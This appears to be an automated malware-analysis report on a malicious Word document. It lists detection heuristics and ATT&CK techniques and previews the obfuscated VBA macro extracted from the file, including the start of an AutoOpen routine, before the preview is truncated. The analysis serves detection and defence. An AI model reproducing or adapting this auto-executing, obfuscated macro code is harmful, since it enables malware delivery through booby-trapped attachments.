MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' specifically points to the GetObject function being used for execution. While the VBA code is heavily obfuscated, the presence of an AutoOpen macro and the GetObject call strongly suggest the intent to download and execute a secondary payload, a common technique for malware delivery.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6895675-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6895675-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65643 bytes |
SHA-256: fc7d5eda4e084a14b5b51b92915417e1f769053ec83cda106f7e18d4592e0347 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "z1QAAQo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AQDxAAk()
If ocD1A4D = HUQZAX Then
NA1oxBA = 554361585 * GAAAxGQ
qU1wUUB = dD_AAAA - 698792739 + 777590765 + GAAACCQA * 507726365 / 374737812 + 103588121 / Chr(982838085 / CSng(591533824 + Round(JCXBXA))) + 418807935 * Log(rXDxADAo) - 24348915 - 438463101 + h_1QXDA * CLng(FoC1A1Q - Atn(fUAQcA / 578844023 / 498215604 + CwCAZC))
uAcDZAQ = 722019255 * lcDAUUB
End If
If LkxAAAG = UQ4AQAAx Then
WcUAwUw = 780657462 * sxBDxA
V1cABGw = Y_A4UAoC - 670880181 + 524188913 + aBCBZxUc * 235166917 / 410551870 + 993926928 / Chr(22542776 / CSng(96875843 + Round(ZGUx4A))) + 631054947 * Log(J4_DGA) - 351019788 - 272742505 + vUAXAABU * CLng(ZoZAAU - Atn(aUcoAA / 389975616 / 898885015 + QAAUDA))
XZDDQAD = 724085957 * FG11AD
End If
If cABBAB = mkBXABXk Then
LQ_GUx = 874156968 * iAQXCU
vBoQQDx = HwkGQ4Z - 788307726 + 298554501 + uBQGAAAC * 971143405 / 914287193 + 630225764 / Chr(480501242 / CSng(360006485 + Round(cDDUAA))) + 776415041 * Log(iwQkAAUA) - 887634697 - 164369999 + BXAAGDA * CLng(mQ_AAUA - Atn(TkQAxwD / 291086681 / 632989598 + w4X_CQA))
oAoAUA_A = 878366526 * zAQQAQUA
End If
If aDQXAUAc = wGxAGBC Then
hXQBAAAX = 344067677 * pQZ4XA
d4A_wA1 = lcDQBC - 380085407 + 481250729 + YA1ZD1A * 799517496 / 435024678 + 162162368 / Chr(424219047 / CSng(848476640 + Round(XAwBA1AA))) + 166038451 * Log(SDwC4kk) - 233134722 - 532067592 + ODAXAx * CLng(ooDUAAA - Atn(h_AkDxUC / 566286129 / 842010666 + P4DQwQ))
coAX4A = 603680362 * wAB4D4AA
End If
If PAAAQUD = DDxAcB_ Then
BUBAwUDA = 587402444 * HGwQAQ
iQxBAGA = MQxkAZDZ - 778105293 + 559422389 + YAkAAUUo * 244553452 / 485098912 + 426228522 / Chr(772469458 / CSng(41835702 + Round(BBQACkA))) + 563580181 * Log(IwAB1QcC) - 567742778 - 189010872 + VkAoU_AD * CLng(jADAcZ - Atn(qXAQQXAA / 960135499 / 937535998 + YDBkAGQA))
qCGDBc = 480703898 * YQoDBBo
End If
If MXADAc = bQUAGXAA Then
TQAkQUAQ = 602512026 * hDxAAAo
ZUADDB = O1ADUXG - 42467324 + 343980876 + kUUD_4o * 172335936 / 685351924 + 88152729 / Chr(539136019 / CSng(391764818 + Round(pUcCGAwB))) + 117722851 * Log(lcwADQ) - 802540459 - 689018974 + PDxDZZ * CLng(XAAwB4A - Atn(jDXkBo / 64953299 / 724179701 + AAAAUCG))
zBAABk = 670779861 * ZA4DGGk
End If
If fUG1www = dwwBcA Then
tQQA_Q = 70485112 * pQAAAwUB
TADQAXAk = mBZGBAA - 102711376 + 439453356 + i1QAUA * 861157225 / 823544849 + 16558329 / Chr(829631648 / CSng(4023308 + Round(KZQcooBA))) + 958392019 * Log(wxDUAX1k) - 357163569 - 770779506 + cDAAA1D * CLng(RZ_DQAXB - Atn(hQ4_UX_U / 843000277 / 538101657 + LACwAc))
IoAXAQ4 = 60882598 * EBADAA
End If
If aDAkwDQG = HAwcGZAA Then
PDDCxA = 939608818 * S44CUQA
jADcQA = X4ADA41X - 474074119 + 434197554 + FZAQDX * 204697818 / 526509723 + 798356989 / Chr(799444247 / CSng(204955026 + Round(J_ADA1UB))) + 145956775 * Log(wAUxAAC) - 355587503 - 905117198 + KZQABA * CLng(hUAQ_A - Atn(HkA1cX / 64478473 / 619793349 + JXABBk1))
qBAUAA = 88181653 * uAwoD4Qw
End If
End Function
Sub autoopen()
On Error Resume Next
If ocU4oGA_ = jkAAAC Then
UAADc4A = 708727178 * KCD_AAQ
nU4UoA = RoAkAGcG - 833435535 + 478957882 + noAkAA * 946852564 / 30364420 + 204085401 / Chr(785819855 / CSng(368662687 + Round(wDUAAB))) + 945141700 * Log(UBAUUAkA) - 500977260 - 319738619 + MAB_Q4 * CLng(ZBZcBAA - Atn(EA_AB_AX / 496449479 / 890617177 + V1A1wG_A))
w_XABACB = 484198909 * uUUo4UAw
End If
If QADBUA1 = tXQ_QAZD Then
BCkGUX = 602933488 * OAwGx1o
oADCcDX = q4BBAAAc - 416540413 + 188126701 + UAQQU4AZ * 518963508 / 162618353 + 902154686 / Chr(696889504 / CSng(125610511 + Round(ADCQZ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.